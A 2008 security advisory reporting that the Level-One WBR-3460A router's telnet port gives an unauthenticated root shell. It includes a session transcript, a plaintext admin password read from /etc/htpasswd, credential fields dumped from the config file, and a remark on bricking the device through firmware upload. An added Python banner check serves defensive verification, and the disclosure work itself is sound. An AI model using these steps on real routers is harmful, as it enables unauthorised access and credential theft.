Advisory: Level-One WBR-3460A Grants Root Access
Risk: High
Vendor Status: Vendor has not released an updated version
Release Date: 08/01/2008
Last Modified: 01/01/2008
Author: Anastasios Monachos [anastasiosm(at)gmail(dot)com]
Level-One WBR-3460A latest firmware available 1.00.12
Level-One WBR-3460A firmware version 1.00.11
The WBR-3460A ships with firmware version 1.00.06 installed. This happens to be the only
available version that is not affected by the vulnerability described below; however, it
lacks WPA2-PSK support and external/internal port mapping in the Virtual servers
configuration page, amongst other things.
The Level-One WBR-3460A is an ADSL2/2+ Modem/Wireless Router which runs Linux BusyBox
v0.61.pre on a 32-bit RISC 4KEc V4.8 processor at 211 BogoMIPS. It incorporates 14 MB of
RAM and four 10/100 Ethernet ports.
Performing an nmap scan on the internal address I came up with the following:
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu, as would be
expected. Although access to that interface can be controlled with a password, there
is no control over the telnet port. So, by telnetting to port 23 (on its default IP
192.168.0.1), users automatically get access to the filesystem without providing any
credentials at all. The file system of the device may then be used for malicious
communication and temporary data storage. Also, a user may download the firmware upgrade
page's HTML code from the www directory and modify it locally to allow files other than
IMGs to be uploaded and replace the existing firmware, making the device useless.
Also, one can view the contents of the /etc/htpasswd file, where everything is in
plaintext, and retrieve the web-based administrator's (admin) password. Some of the
possible implications that can be triggered from the web interface include, but are not
limited to, the following:
tasos@nyx:~$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is '^]'.
BusyBox v0.61.pre (2007.03.16-05:39+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
bin dev etc lib proc sbin tmp usr var www
1 3 84 dma loadavg stat
107 3035 86 driver locks swaps
108 4 87 execdomains meminfo sys
110 43 89 filesystems misc sysvipc
111 4456 91 fs modules ticfg
112 5 92 interrupts mounts tty
1192 5233 avalanche iomem mtd uptime
124 5237 br_filter ioports net version
130 5239 br_trigger kcore partitions wlan
132 6 bus kmsg push_button
2 68 cmdline ksyms self
20 7 cpuinfo led slabinfo
246 80 devices led_mod special
admin:MySecretPassword
any data
IP806GAV3 time_zone=GMT+0 time_daylight= restore_default=0
(…removed for simplicity…)
dhcp_reserved= http_username=admin http_password=32spec904et28 http_timeout=5
(…removed for simplicity…)
[email protected] pppoe_password=xxxxxxxx
(…removed for simplicity…)
wifi_access_list=00:1B:72:23:00:51Tasos-Laptop 00:01:71:97:86:0BTasos-WDongle
(…removed for simplicity…)
wifi_present=1 wiz_runtest= ipoa_mode= wifi_psk_pwd=Js5xxkwD3fvtxxxxx645KdLxxxxxx
i. Please note that if the modem/router is power-cycled, any file that had been
created earlier will vanish
ii. All three versions of the firmware that were tested had no open ports visible from
the Internet
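A way to check from the LAN side whether a given firmware build shows the behaviour described above, written as an added example that is not part of the original advisory: it classifies the first bytes a telnet service sends as either a login prompt or a shell greeting with no authentication step. The function names, the regular expressions and the two sample captures are assumptions constructed for illustration; the BusyBox greeting text is taken from the session shown above.

```python
import re
import socket

IAC, SB, SE = 255, 250, 240  # telnet command bytes (RFC 854)
LOGIN_RE = re.compile(rb"(login|username|password)\s*:", re.I)
SHELL_RE = re.compile(rb"built-in shell|[#$>] ?$", re.I)  # heuristic, an assumption

# Constructed sample captures (not recorded from a device).
SAMPLE_OPEN = (b"\xff\xfd\x01\xff\xfd\x1f\r\nBusyBox v0.61.pre (2007.03.16-05:39+0000) "
               b"Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n# ")
SAMPLE_LOGIN = b"\xff\xfb\x01\xff\xfb\x03\r\nrouter login: "

def strip_telnet_negotiation(data: bytes) -> bytes:
    """Drop IAC option negotiation so only the visible text remains."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 >= len(data):
            break                          # truncated command at end of capture
        elif data[i + 1] == IAC:           # escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif data[i + 1] == SB:            # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif 251 <= data[i + 1] <= 254:    # WILL/WONT/DO/DONT plus option byte
            i += 3
        else:
            i += 2                         # any other two-byte command
    return bytes(out)

def classify_banner(raw: bytes) -> str:
    """Return 'login-required', 'unauthenticated-shell' or 'unknown'."""
    text = strip_telnet_negotiation(raw).strip()
    if LOGIN_RE.search(text):
        return "login-required"
    if SHELL_RE.search(text):
        return "unauthenticated-shell"
    return "unknown"

def grab_banner(host: str, port: int = 23, timeout: float = 3.0) -> bytes:
    """Read whatever the service sends first; nothing is sent to it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""
```

Run `classify_banner(grab_banner("192.168.0.1"))` against your own router after each firmware change. A result of "unknown" usually means the service is waiting for option negotiation before it prints anything, so it is not evidence that a login is enforced.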
i. Level One WBR-3460A - http://global.level1.com/products2.php?Id=821
Copyright 2008 Anastasios Monachos [anastasiosm(at)gmail(dot)com]
The information in the advisory is believed to be accurate at the time
of publishing, based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information, and the author does
not accept any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.
Permission is granted for the redistribution of this alert, as long as
this Legal Notice remains intact.